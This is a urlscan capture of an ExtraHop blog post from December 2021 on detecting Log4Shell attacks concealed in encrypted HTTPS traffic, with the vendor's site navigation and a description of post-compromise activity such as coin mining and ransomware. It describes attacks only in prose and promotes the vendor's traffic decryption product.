www.extrahop.com Open in urlscan Pro
52.43.9.41  Public Scan

Form analysis
2 forms found in the DOM

Name: untitledForm-1367515949663 — POST https://s1701.t.eloqua.com/e/f2

<form method="POST" id="form107" name="untitledForm-1367515949663" role="form" action="https://s1701.t.eloqua.com/e/f2" class="reset-disabled" data-parsley-validate="" data-parsley-trigger="focusout" data-onload="extrahop.undisableForm"
  novalidate="">
  <input type="hidden" name="elqFormName" value="untitledForm-1367515949663">
  <input type="hidden" name="elqSiteId" value="1701">
  <input type="hidden" name="elqCampaignId">
  <input type="hidden" name="campaignId" value="70180000001EqjnAAC">
  <input type="hidden" name="elqCustomerGUID">
  <input type="hidden" name="elqCookieWrite" value="0">
  <input type="hidden" name="GA_Medium" value="">
  <input type="hidden" name="GA_Source" value="">
  <input type="hidden" name="GA_Campaign" value="">
  <input type="hidden" name="GA_Content" value="">
  <input type="hidden" name="GA_Term" value="">
  <input type="hidden" name="GA_Product" value="">
  <input type="hidden" name="GA_Region" value="">
  <input type="hidden" name="GA_Funnelstage" value="">
  <input type="hidden" name="GA_Version" value="">
  <input type="hidden" name="gclid" value="">
  <input type="hidden" name="FormURL" value="">
  <input type="hidden" name="uniqueid" value="">
  <input type="hidden" name="GA_Adgroup" value="">
  <input type="hidden" name="redirectUrl" value="https://www.extrahop.com/company/newsletter-signup-success/" data-sync-host="www">
  <div class="inline-input">
    <div class="form-group email">
      <input id="email" class="form-control garlic-auto-save" name="email" type="email" required="" placeholder="Email Address">
    </div>
    <div class="form-group">
      <input type="submit" class="btn btn-basic btn-green" value="Subscribe" data-track-newsletter-subscribe="">
    </div>
  </div>
</form>

<form>
  <input class="st-default-search-input st-search-set-focus" type="text" value="" placeholder="Search this site" aria-label="Search this site" id="st-overlay-search-input" autocomplete="off" autocorrect="off" autocapitalize="off">
</form>

Text Content

 * The Platform
   
   
   EXTRAHOP
   REVEAL(X) 360
   
   CLOUD-NATIVE VISIBILITY, DETECTION, AND RESPONSE
   FOR THE HYBRID ENTERPRISE.
   
   Learn More
   
   Explore Reveal(x)
   
   How It Works
   
   Competitive Comparison
   
   Why Decryption Matters
   
   Integrations and Automations
   
   Cybersecurity Services
   
   Free Shields Up Assessment
   
   What is Network Detection & Response (NDR)?
   
   Cloud-Native Security Solutions
   
   Reveal(x) Enterprise: Self-Managed NDR

 * Solutions
   
   --------------------------------------------------------------------------------
   
   
   SOLUTIONS
   
   With the power of machine learning, gain the insight you need to solve
   pressing challenges.
   
   FOR SECURITY
   
   Stand up to threats with real-time detection and fast response.
   
   Learn More >
   
   FOR CLOUD
   
   Gain complete visibility for cloud, multi-cloud, or hybrid environments.
   
   Learn More >
   
   FOR IT OPS
   
   Share information, boost collaboration without sacrificing security.
   
   Learn More >
   
   BY INITIATIVE
   
    * Free Shields Up Assessment
    * Advanced Threats
    * Ransomware Mitigation
    * Multicloud & Hybrid Cloud Security
    * Implement Zero Trust
    * Security Operations Transformation
   
   BY VERTICAL
   
    * Financial Services
    * Healthcare
    * e-Commerce and Retail
    * U.S. Public Sector
   
   Featured Customer Story
   
   
   WIZARDS OF THE COAST
   
   Wizards of the Coast Delivers Frictionless Security for Agile Game
   Development with ExtraHop
   
   Read More
   
   See All Customer Stories >

 * Customers
   
   --------------------------------------------------------------------------------
   
   
   CUSTOMERS
   
   Our customers stop cybercriminals in their tracks while streamlining
   workflows. Learn how or get support.
   
   COMMUNITY
   
    * Customer Portal Login
    * Solution Bundles Gallery
    * Community Forums
    * Customer Stories
   
   SERVICES
   
    * Services Overview
    * Reveal(x) Advisor
    * Deployment
   
   TRAINING
   
    * Training Overview
    * Training Sessions
   
   SUPPORT
   
    * Support Overview
    * Documentation
    * Hardware Policies
   
   Featured Customer Story
   
   
   WIZARDS OF THE COAST
   
   Wizards of the Coast Delivers Frictionless Security for Agile Game
   Development with ExtraHop
   
   Read More
   
   See All Customer Stories >

 * Partners
   
   --------------------------------------------------------------------------------
   
   
   PARTNERS
   
   Our partners help extend the upper hand to more teams, across more platforms.
   
   CHANNEL PARTNERS
   
    * Channel Overview
    * Managed Services Providers
    * Overwatch Managed NDR
   
   INTEGRATION PARTNERS
   
    * CrowdStrike
    * Amazon Web Services
    * Google Cloud Security
    * All Technology Partners
   
   PANORAMA PROGRAM
   
    * Partner Program Information
    * Partner Portal Login
    * Become a Partner
   
   Featured Integration Partner
   
   
   CROWDSTRIKE
   
   Detect network attacks. Correlate threat intelligence and forensics.
   Auto-contain impacted endpoints. Inventory unmanaged devices and IoT.
   
   Read More
   
   See All Integration Partners >

 * Blog
 * More
    * About Us
    * News & Events
    * Careers
    * Resources
   
    * About Us
    * The ExtraHop Advantage
    * What Is Cloud-Native?
    * Leadership
    * Board of Directors
    * Contact Us
   
    * Explore the Interactive Online Demo
    * Take the Hunter Challenge
    * Upcoming Webinars and Events
    * Newsroom
    * ExtraHop Media Kit and Brand Guidelines
   
   
   HUNTER CHALLENGE
   
   Get hands-on with ExtraHop's cloud-native NDR platform in a capture the flag
   style event.
   
   Read More
   
   
   
    * Careers at ExtraHop
    * Search Openings
    * Connect on LinkedIn
   
    * All Resources
    * Customer Stories
    * Free Shields Up Assessment
    * Ransomware Attacks in 2021: A Retrospective
    * White Papers
    * Datasheets
    * Industry Reports
    * Webinars
   
    * Cyberattack Glossary
    * Network Protocols Glossary
    * Documentation
    * Firmware
    * Training Videos


English
 * 日本語

Login
Logout
Start Demo





THE PLATFORM


SOLUTIONS


CUSTOMERS


PARTNERS


BLOG


MORE

START THE DEMO

CONTACT US

Back


EXTRAHOP
REVEAL(X) 360

Cloud-native visibility, detection, and response
for the hybrid enterprise.

Learn More

HOW IT WORKS

COMPETITIVE COMPARISON

WHY DECRYPTION MATTERS

INTEGRATIONS AND AUTOMATIONS

CYBERSECURITY SERVICES

FREE SHIELDS UP ASSESSMENT

WHAT IS NETWORK DETECTION & RESPONSE (NDR)?

CLOUD-NATIVE SECURITY SOLUTIONS

REVEAL(X) ENTERPRISE: SELF-MANAGED NDR

Back


SOLUTIONS



Learn More

SECURITY

CLOUD

IT OPS

USE CASES

EXPLORE BY INDUSTRY VERTICAL

Back


CUSTOMERS

Customer resources, training,
case studies, and more.

Learn More

CUSTOMER PORTAL LOGIN

CYBERSECURITY SERVICES

TRAINING

EXTRAHOP SUPPORT

Back


PARTNERS

Partner resources and information about our channel and technology partners.

Learn More

CHANNEL PARTNERS

INTEGRATIONS AND AUTOMATIONS

PARTNERS

Back


BLOG



Learn More
Back


ABOUT US


NEWS & EVENTS


CAREERS


RESOURCES

Back


ABOUT US

See what sets ExtraHop apart, from our innovative approach to our corporate
culture.

Learn More

THE EXTRAHOP ADVANTAGE

WHAT IS CLOUD-NATIVE?

CONTACT US

Back


NEWS & EVENTS

Get the latest news and information.

Learn More

TAKE THE HUNTER CHALLENGE

UPCOMING WEBINARS AND EVENTS

Back


CAREERS

We believe in what we're doing. Are you ready to join us?

Learn More

CAREERS AT EXTRAHOP

SEARCH OPENINGS

CONNECT ON LINKEDIN

Back


RESOURCES

Find white papers, reports, datasheets, and more by exploring our full resource
archive.

All Resources

CUSTOMER STORIES

FREE SHIELDS UP ASSESSMENT

RANSOMWARE ATTACKS IN 2021: A RETROSPECTIVE

CYBERATTACK GLOSSARY

NETWORK PROTOCOLS GLOSSARY

DOCUMENTATION

FIRMWARE

TRAINING VIDEOS


BLOG


DETECT LOG4J ATTACKS HIDING IN ENCRYPTED TRAFFIC

 * Published by Jeff Costlow on December 17, 2021

ExtraHop threat researchers have observed attackers in the wild using encrypted
traffic to avoid detection of Log4Shell attacks. This is consistent with the
general trend of cyberattackers using encryption as an evasion mechanism to
avoid detection during both the initial intrusion and lateral movement stages of
an attack, among others.

The use of encrypted traffic will completely hide post-compromise Log4Shell
activity from many security detection and investigation tools. Security
practitioners should examine their security tooling to determine whether they
have sufficient decryption and traffic inspection capabilities to catch
encrypted Log4Shell-related exploits and the subsequent post-compromise threat
behavior, which can include installation of coin miners, ransomware delivery,
and data exfiltration, among others.


HOW ENCRYPTED LOG4SHELL ATTACKS WORK

Log4j exploits work by prompting the Log4j library to reach out to an external,
attacker-controlled source and retrieve a Java class, which is then executed.
Here's a nifty graphic showing the sequence of events:



Multiple encrypted protocols can be used in Log4Shell attacks. For this example,
we will focus on the most common: HTTPS. Attack steps at both the initial
intrusion and post-compromise stages of a successful attack can be executed
using unencrypted HTTP or encrypted HTTPS. In these steps malicious JNDI
requests may be included in one or more of the fields included in all HTTPS
requests.

These malicious JNDI requests can be detected in plaintext HTTP traffic. But if
the traffic is encrypted, the malicious requests are hidden from the view of
security analysts and their tools unless they have some way of decrypting the
traffic. Reveal(x) is able to securely decrypt HTTPS traffic, completely out of
band, to detect and investigate these attacks with full access to the malicious
JNDI strings. Security tools without decryption capabilities will not catch
encrypted versions of this attack.

The annotated screenshot below shows a set of HTTP and HTTPS transaction records
observed by ExtraHop Reveal(x). You can see various characteristics of the
requests, including:

 1. Which port the request came over: We can see port 80, which is default for
    unencrypted HTTP, and port 443, the default for encrypted HTTPS
 2. User Agent field containing malicious JNDI payloads, indicating a Log4j
    exploit
 3. Origin field, also containing malicious JNDI payloads

It is critical to note that the important information about which devices had
been attacked with a Log4Shell exploit—and how they had responded—would be
completely hidden in the encrypted traffic on port 443. The reason we can see it
in this screenshot is that Reveal(x) 360 is able to decrypt HTTPS traffic for
inspection in a secure way that does not violate any security or privacy
requirements. Without this capability, threat detection tools that rely on
pattern or string matching, or even behavior to some extent, would see nothing
of interest here. Security analysts and investigators would be unable to access
these details, and the attacker would be free to continue exploiting.

Identifying information in this screenshot has been redacted.


POST-COMPROMISE ACTIVITY FROM LOG4SHELL ATTACKS

As a remote code execution (RCE) vulnerability, the Log4Shell vulnerabilities
can be the starting point of nearly any type of attack campaign. A few
post-compromise activities that have been observed in the wake of Log4Shell
exploits include:

 * Coin miner activity: specifically the installation of XMrig. Reveal(x) is
   able to detect this post-compromise activity by identifying usage of the
   Stratum coin mining protocol.
 * Ransomware delivery: As one of the most profitable attacker strategies, it
   was inevitable that ransomware would start to be delivered via Log4Shell.
   Reveal(x) has several mechanisms for detecting and responding to ransomware
   attacks. Reveal(x) ransomware detections are driven by behavioral monitoring,
   and can work regardless of the delivery mechanism.
 * Lateral Movement: Attackers don't stop when they compromise a machine in a
   target environment. They move laterally, using encrypted protocols to affect
   other devices on the network, to establish persistence, and to expand their
   reach to ultimately achieve more impact, whether by exfiltrating data or
   distributing ransomware more widely. Reveal(x) is able to detect lateral
   movement and living off the land tactics, including abuse of Active Directory
   systems and remote access protocols such as MSRPC, PSExec, and more.


A NOTE ON LOG4J AND SUPPLY CHAIN ATTACKS

It became increasingly clear in 2021 that the software supply chain represents a
source of risk that can affect anyone. The SolarWinds SUNBURST attack, and the
Kaseya/REvil attacks used the software supply chain to gain unauthorized access
and inflict massive damage on thousands of organizations. Log4Shell exploits are
different in that they exploit a zero-day vulnerability that was not maliciously
introduced by attackers. But Log4j is so ubiquitous that many vendors are
susceptible to it, especially in their development environments and continuous
integration and continuous delivery (CI/CD) pipelines. This widespread
availability of a zero-day vulnerability makes it likely to be exploited. Anyone
using software must assume their providers are vulnerable and take measures to
secure their supply chain, in addition to their own network.

Log4j is a widely used component that is present in many, many systems and
pieces of software worldwide. It is likely that many people and companies
vulnerable to this attack are not yet even aware that they are vulnerable. For
security practitioners and vendors alike, it is important to investigate
internally and to check with any vendors and service providers you work with to
assure that they are taking steps to protect themselves and you!


HOW TO DETECT LOG4SHELL ATTACKS IN ENCRYPTED TRAFFIC

To detect encrypted Log4Shell attacks, you have to be decrypting the right
traffic. The ability to decrypt traffic for inspection is a standard feature of
Reveal(x). Customers have complete control over whether it is enabled and
granular control over which traffic streams to decrypt for inspection. ExtraHop
customers with decryption enabled for HTTPS traffic streams where Log4Shell
attacks are likely to occur will be able to detect and investigate attacks with
the details shown in the above screenshot.

If you're a current customer and want to enable decryption capabilities in
Reveal(x), visit the SSL/TLS decryption page of the ExtraHop documentation
website.

For help identifying which traffic to decrypt to make it easier to detect and
respond to Log4Shell, please reach out to your ExtraHop account contact.

If you're not an ExtraHop customer and want to learn more about strategic
decryption and how it can help detect today's advanced attacks, check out our
white paper Encryption vs. Visibility: Why SecOps Must Decrypt Traffic for
Analysis.

 * Posted in Cybersecurity, Security Alerts, NDR
 * See other posts by Jeff Costlow


HUNT THREATS WITH REVEAL(X)

Investigate a live attack in the full product demo of ExtraHop Reveal(x),
network detecion and response for the hybrid enterprise.

Start Demo


RELATED BLOGS

12.10.21


DEFEND AGAINST LOG4J EXPLOITS

Understand Log4j exploitation and what you can do about this zero-day
vulnerability.

Jeff Costlow

9.28.21


DETECT MALWARE IN ENCRYPTED TRAFFIC FOR IMPROVED SECURITY VISIBILITY

Encryption gives attackers dark places to hide. Learn which common solutions for
network visibility fall short, and which can accurately detect advanced threats.

Jesse Munos

10.14.21


DETECTING ATTACKS USING MICROSOFT PROTOCOL DECRYPTION

Microsoft Active Directory is a favorite target for attackers, and traditional
threat detection techniques are falling short. Learn why and what you can do.

Jesse Munos


SIGN UP TO STAY INFORMED

Javascript is required to submit this form


+

ExtraHop uses cookies to improve your online experience. By using this website,
you consent to the use of cookies. Learn More

Global Headquarters
520 Pike St
Suite 1600
Seattle, WA 98101
United States

EMEA Headquarters
WeWork 8
Devonshire Square
London EC2M 4PL
United Kingdom

APAC Headquarters
3 Temasek Avenue
Centennial Tower
Level 18
Singapore 039190

PLATFORM

 * Reveal(x) 360
 * How It Works
 * Competitive Comparison
 * Why Decryption Matters
 * Integrations and Automations
 * Cybersecurity Services
 * Free Shields Up Assessment
 * What is Network Detection & Response (NDR)?
 * Cloud-Native Security Solutions
 * Reveal(x) Enterprise: Self-Managed NDR

SOLUTIONS

 * Security
 * Cloud
 * IT Ops
 * Use Cases
 * Industries

CUSTOMERS

 * Customer Portal Login
 * Services Overview
 * Training Overview
 * Support Overview

PARTNERS

 * Channel Overview
 * Technology Integration Partners
 * Partner Program Information

BLOG

MORE

 * About Us
 * News & Events
 * Careers
 * Resources

 * Copyright ExtraHop Networks 2022
 * Terms of Use
 * Privacy Policy
 * 日本語

 * Facebook
 * Twitter
 * LinkedIn
 * Instagram
 * YouTube


0:30











Close


suggested results